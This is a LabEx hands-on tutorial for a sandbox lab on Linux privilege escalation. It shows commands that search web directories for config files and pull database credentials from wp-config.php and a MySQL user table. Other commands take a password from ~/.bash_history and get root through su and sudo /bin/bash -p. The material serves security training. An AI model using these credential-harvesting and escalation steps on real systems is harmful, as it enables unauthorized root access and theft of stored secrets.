LabEx
Log In Join For Free

Privilege Escalation Through Linux Configurations

Beginner

Introduction

In this lab, we will learn how to find and exploit sensitive configuration files on a Linux system to escalate our privileges to root. The goal is to gain a deeper understanding of web service configuration files and user-related configuration files, and how to leverage them for privilege escalation. We will assume that we have already obtained a low-privileged shell, such as the www-data user, through a web vulnerability, and we will explore techniques to elevate our access to root.

Investigating Web Service Configuration Files

Web service configuration files may contain sensitive information, such as database credentials, which can be used for privilege escalation if the administrator has reused passwords.

  1. First, open a terminal and navigate to /home/labex/project.

    cd /home/labex/project

    Let's begin by initializing the lab environment:

    ./env_setup_1.sh

    After the initialization, we are now operating as the www-data user, simulating a low-privileged shell obtained through a web vulnerability.

  2. Web services on Linux are typically stored in the /var/www directory. We should focus on the following files:

    • database.php
    • user.php
    • *.config
    • config.php

    We can search for these files using the following command:

    find /var/www -type f \( -iname "user.php" -o -iname "database.php" -o -iname "config.php" -o -iname "*.config" \) 2>/dev/null

    Expected output:

    /var/www/wordpress/wp-admin/includes/user.php
/var/www/wordpress/wp-includes/user.php
/var/www/wordpress/wp-content/plugins/akismet/views/config.php

    Additionally, if the target system is using a Content Management System (CMS), we can search for the default database connection file location for that specific CMS.

  3. In this lab environment, the server is using the WordPress CMS. By searching, we find that the WordPress database configuration is stored in the /var/www/wordpress/wp-config.php file:

    more /var/www/wordpress/wp-config.php

    This file contains the MySQL root account credentials:

    /** MySQL database username */
define( 'DB_USER', 'root' );

/** MySQL database password */
define( 'DB_PASSWORD', 'cD8M2M8fMiDHu4m1' );

  4. Considering the possibility of password reuse by the administrator, we can attempt to log in as the system root user using this password:

    su -

    Unfortunately, this password does not work for the root user.

  5. Next, we can log in to the MySQL database and search for more information:

    mysql -u root -p -h 127.0.0.1

    Enter the password from the wp-config.php file:

    cD8M2M8fMiDHu4m1

    Inside the MySQL database, we can execute the following commands to gather more information:

    Check the available databases:

    show databases;

    Select the ROB database:

    use ROB;

    List the tables in the ROB database:

    show tables;

    Select the rob_user table:

    select * from rob_user;

    From the database, we obtain two more sets of credentials:

    root:CMPc5MoAGf
alice:psoj9apv4u

    Exit the MySQL database:

    exit

  6. We can try logging in as the root user using the password CMPc5MoAGf:

    su -

    Enter the password we obtained from the database:

    CMPc5MoAGf

    This time, we successfully gain root access!

  7. Create a file named proof.txt in the /root directory to demonstrate successful privilege escalation:

    echo "Success" > /root/proof.txt

    Verify the file has been created:

    ls /root/proof.txt

In this step, we learned how to find and exploit sensitive information in web service configuration files to escalate privileges. The core idea is to search for authentication credentials on the server and leverage potential password reuse for privilege escalation.

In this step, we will focus on user-related configuration files that may contain sensitive information.

After last step, you may still at the root shell. For this step, we will switch back to the labex user by running the following command:

su - labex

  1. First, navigate to /home/labex/project.

    cd /home/labex/project

    Let's begin by initializing the lab environment:

    ./env_setup_2.sh

    After the initialization, we are now operating as the user001 user.

  2. The two main user-related configuration files to investigate are:

    • ~/.bash_profile: Used for configuring environment variables and startup programs. This file is executed when a user logs in (login).
    • ~/.bash_history: A file in each user's home directory that records the user's shell command history, typically storing the last 1000 commands (this feature may be disabled on some Linux distributions).

  3. Let's start by checking the ~/.bash_profile file:

    cat ~/.bash_profile

    Expected output:

    cat: /home/user001/.bash_profile: No such file or directory

    In this case, the user001 user does not seem to be using the ~/.bash_profile file.

  4. Next, let's check the ~/.bash_history file:

    cat ~/.bash_history

    Here, we find a command recorded in the history:

    ...
echo user001:09FMWNFS7n|chpasswd
...

    This command suggests that the user001 user's password has been changed to 09FMWNFS7n.

  5. We can attempt to use this password to gain elevated privileges:

    sudo whoami

    And enter the password we found in the ~/.bash_history file:

    09FMWNFS7n

    The password works, and we can execute commands with sudo privileges.

  6. To gain a root shell, we can use the following command:

    sudo /bin/bash -p

    We have successfully obtained a root shell by exploiting information from the user's command history.

  7. Finally, Create a file named success.txt in the /root directory to complete the lab:

    echo "Congratulations" | sudo tee /root/success.txt

Summary

In this lab, we learned how to find and exploit sensitive information in web service configuration files and user-related configuration files to escalate privileges on a Linux system. We explored techniques for searching for files that may contain authentication credentials, such as database connection files, user command history, and other configuration files. By leveraging potential password reuse, we were able to gain root access.

The key takeaway is to always be on the lookout for sensitive information stored on the system, as it can potentially lead to privilege escalation. While this lab focused on specific types of files, it is essential to maintain a mindset of continuously searching for any files or information that could be exploited for privilege escalation purposes.

Other Tutorials you may like

We use cookies for a number of reasons, such as keeping the website reliable and secure, to improve your experience on our website and to see how you interact with it. By accepting, you agree to our use of such cookies. Privacy Policy